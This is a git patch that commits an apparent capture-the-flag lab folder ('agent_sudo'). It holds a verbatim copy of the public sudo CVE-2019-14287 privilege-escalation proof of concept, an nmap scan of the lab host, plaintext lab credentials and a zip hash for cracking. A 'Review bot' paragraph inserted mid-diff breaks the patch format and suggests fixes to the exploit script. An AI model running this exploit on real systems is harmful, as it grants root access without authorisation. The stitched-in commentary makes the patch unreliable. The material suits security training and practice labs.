From 8e07e852ee302516e02e8d2773ca45538c28910e Mon Sep 17 00:00:00 2001
From: Raghuram Subramani
Date: Sat, 17 Sep 2022 21:21:29 -0400
Subject: add agent_sudo
---
 agent_sudo/47502.py | 80 ++++++++++++++++++++++++++
 agent_sudo/Alien_autospy.jpg | Bin 0 -> 42189 bytes
 agent_sudo/README.md | 6 ++
 agent_sudo/To_agentJ.txt | 6 ++
 agent_sudo/_cutie.png.extracted/365 | Bin 0 -> 279312 bytes
 agent_sudo/_cutie.png.extracted/365.zlib | Bin 0 -> 33973 bytes
 agent_sudo/_cutie.png.extracted/8702.zip | Bin 0 -> 280 bytes
 agent_sudo/_cutie.png.extracted/To_agentR.txt | 6 ++
 agent_sudo/cute-alien.jpg | Bin 0 -> 33143 bytes
 agent_sudo/cutie.png | Bin 0 -> 34842 bytes
 agent_sudo/forjohn_zip | 1 +
 agent_sudo/message.txt | 8 +++
 agent_sudo/nmap | 25 ++++++++
 13 files changed, 132 insertions(+)
 create mode 100644 agent_sudo/47502.py
 create mode 100644 agent_sudo/Alien_autospy.jpg
 create mode 100644 agent_sudo/README.md
 create mode 100644 agent_sudo/To_agentJ.txt
 create mode 100644 agent_sudo/_cutie.png.extracted/365
 create mode 100644 agent_sudo/_cutie.png.extracted/365.zlib
 create mode 100644 agent_sudo/_cutie.png.extracted/8702.zip
 create mode 100644 agent_sudo/_cutie.png.extracted/To_agentR.txt
 create mode 100644 agent_sudo/cute-alien.jpg
 create mode 100644 agent_sudo/cutie.png
 create mode 100644 agent_sudo/forjohn_zip
 create mode 100644 agent_sudo/message.txt
 create mode 100644 agent_sudo/nmap
(limited to 'agent_sudo')
diff --git a/agent_sudo/47502.py b/agent_sudo/47502.py
new file mode 100644
index 0000000..907d29a
--- /dev/null
+++ b/agent_sudo/47502.py
@@ -0,0 +1,80 @@
+# Exploit Title : sudo 1.8.27 - Security Bypass
+# Date : 2019-10-15
+# Original Author: Joe Vennix
+# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
+# Version : Sudo <1.8.28
+# Tested on Linux
+# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
+# Fix : The bug is fixed in sudo 1.8.28
+# CVE : 2019-14287
+
+'''Check for the user sudo permissions
+
+sudo -l
+
+User hacker may run the following commands on kali:
+ (ALL, !root) /bin/bash
+
+
+So user hacker can't run /bin/bash as root (!root)
+
+
+User hacker sudo privilege in /etc/sudoers
+
+# User privilege specification
+root ALL=(ALL:ALL) ALL
+
+hacker ALL=(ALL,!root) /bin/bash
+
+
+With ALL specified, user hacker can run the binary /bin/bash as any user
+
+EXPLOIT:
+
+sudo -u#-1 /bin/bash
+
+Example :
+
+hacker@kali:~$ sudo -u#-1 /bin/bash
+root@kali:/home/hacker# id
+uid=0(root) gid=1000(hacker) groups=1000(hacker)
+root@kali:/home/hacker#
+
+Description :
+Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
+-u#-1 returns as 0 which is root's id
+
+and /bin/bash is executed with root permission
+Proof of Concept Code :
+
+How to use :
+python3 sudo_exploit.py
+
+'''
+
+
+#!/usr/bin/python3
+
+import os
+
+#Get current username
+
+username = input("Enter current username :")
+
+
+#check which binary the user can run with sudo
+
+os.system("sudo -l > priv")
+
+
+os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")
+
+binary_file = open("binary")
+
+binary= binary_file.read()
+
+#execute sudo exploit
+
+print("Lets hope it works")
+
+os.system("sudo -u#-1 "+ binary)
\ No newline at end of file
diff --git a/agent_sudo/Alien_autospy.jpg b/agent_sudo/Alien_autospy.jpg
new file mode 100644
index 0000000..b82c847
Binary files /dev/null and b/agent_sudo/Alien_autospy.jpg differ
diff --git a/agent_sudo/README.md b/agent_sudo/README.md
new file mode 100644
index 0000000..e20e876
--- /dev/null
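Review bot: The `#!/usr/bin/python3` shebang sits on line 56 of the new file, after the header comments and the docstring, so it is inert and the file cannot be run directly as `./47502.py`; either move it to line 1 or drop it and rely on the `python3 …` invocation the docstring gives. Two smaller defects in the same hunk: `binary_file = open("binary")` is never closed, which `with open("binary") as binary_file: binary = binary_file.read()` would fix, and `username = input("Enter current username :")` is read but never used, so the prompt misleads the reader. The filename suggests this is a verbatim copy of a published PoC; a one-line comment at the top such as `# Vendored unchanged from the public PoC; the header below gives the CVE and the fixed sudo version (1.8.28)` would tell a maintainer not to expect local edits here.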
+++ b/agent_sudo/README.md
@@ -0,0 +1,6 @@
+> creds
+```
+ftp: chris:crystal
+zip: alien
+james:hackerrules!
+```
diff --git a/agent_sudo/To_agentJ.txt b/agent_sudo/To_agentJ.txt
new file mode 100644
index 0000000..8cd771b
--- /dev/null
+++ b/agent_sudo/To_agentJ.txt
@@ -0,0 +1,6 @@
+Dear agent J,
+
+All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
+
+From,
+Agent C
diff --git a/agent_sudo/_cutie.png.extracted/365 b/agent_sudo/_cutie.png.extracted/365
new file mode 100644
index 0000000..0a09622
Binary files /dev/null and b/agent_sudo/_cutie.png.extracted/365 differ
diff --git a/agent_sudo/_cutie.png.extracted/365.zlib b/agent_sudo/_cutie.png.extracted/365.zlib
new file mode 100644
index 0000000..be7e8d6
Binary files /dev/null and b/agent_sudo/_cutie.png.extracted/365.zlib differ
diff --git a/agent_sudo/_cutie.png.extracted/8702.zip b/agent_sudo/_cutie.png.extracted/8702.zip
new file mode 100644
index 0000000..ead18d3
Binary files /dev/null and b/agent_sudo/_cutie.png.extracted/8702.zip differ
diff --git a/agent_sudo/_cutie.png.extracted/To_agentR.txt b/agent_sudo/_cutie.png.extracted/To_agentR.txt
new file mode 100644
index 0000000..732bb92
--- /dev/null
+++ b/agent_sudo/_cutie.png.extracted/To_agentR.txt
@@ -0,0 +1,6 @@
+Agent C,
+
+We need to send the picture to 'QXJlYTUx' as soon as possible!
+
+By,
+Agent R
diff --git a/agent_sudo/cute-alien.jpg b/agent_sudo/cute-alien.jpg
new file mode 100644
index 0000000..1780a48
Binary files /dev/null and b/agent_sudo/cute-alien.jpg differ
diff --git a/agent_sudo/cutie.png b/agent_sudo/cutie.png
new file mode 100644
index 0000000..6e51f7c
Binary files /dev/null and b/agent_sudo/cutie.png differ
diff --git a/agent_sudo/forjohn_zip b/agent_sudo/forjohn_zip
new file mode 100644
index 0000000..bac0057
--- /dev/null
+++ b/agent_sudo/forjohn_zip
@@ -0,0 +1 @@
+8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zip
diff --git a/agent_sudo/message.txt b/agent_sudo/message.txt
new file mode 100644
index 0000000..090aa63
--- /dev/null
+++ b/agent_sudo/message.txt
@@ -0,0 +1,8 @@
+Hi james,
+
+Glad you find this message. Your login password is hackerrules!
+
+Don't ask me why the password look cheesy, ask agent R who set this password for you.
+
+Your buddy,
+chris
diff --git a/agent_sudo/nmap b/agent_sudo/nmap
new file mode 100644
index 0000000..7a021cd
--- /dev/null
+++ b/agent_sudo/nmap
@@ -0,0 +1,25 @@
+# Nmap 7.92 scan initiated Sat Sep 17 05:55:05 2022 as: nmap -vvv -p 21,22,80 -sC -sV -oN nmap 10.10.14.85
+Nmap scan report for 10.10.14.85
+Host is up, received conn-refused (0.14s latency).
+Scanned at 2022-09-17 05:55:05 EDT for 15s
+
+PORT STATE SERVICE REASON VERSION
+21/tcp open ftp syn-ack vsftpd 3.0.3
+22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5hdrxDB30IcSGobuBxhwKJ8g+DJcUO5xzoaZP/vJBtWoSf4nWDqaqlJdEF0Vu7Sw7i0R3aHRKGc5mKmjRuhSEtuKKjKdZqzL3xNTI2cItmyKsMgZz+lbMnc3DouIHqlh748nQknD/28+RXREsNtQZtd0VmBZcY1TD0U4XJXPiwleilnsbwWA7pg26cAv9B7CcaqvMgldjSTdkT1QNgrx51g4IFxtMIFGeJDh2oJkfPcX6KDcYo6c9W1l+SCSivAQsJ1dXgA2bLFkG/wPaJaBgCzb8IOZOfxQjnIqBdUNFQPlwshX/nq26BMhNGKMENXJUpvUTshoJ/rFGgZ9Nj31r
+| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHdSVnnzMMv6VBLmga/Wpb94C9M2nOXyu36FCwzHtLB4S4lGXa2LzB5jqnAQa0ihI6IDtQUimgvooZCLNl6ob68=
+| 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOL3wRjJ5kmGs/hI4aXEwEndh81Pm/fvo8EvcpDHR5nt
+80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
+|_http-title: Annoucement
+| http-methods:
+|_ Supported Methods: GET HEAD POST OPTIONS
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Sat Sep 17 05:55:20 2022 -- 1 IP address (1 host up) scanned in 15.26 seconds
-- cgit v1.2.3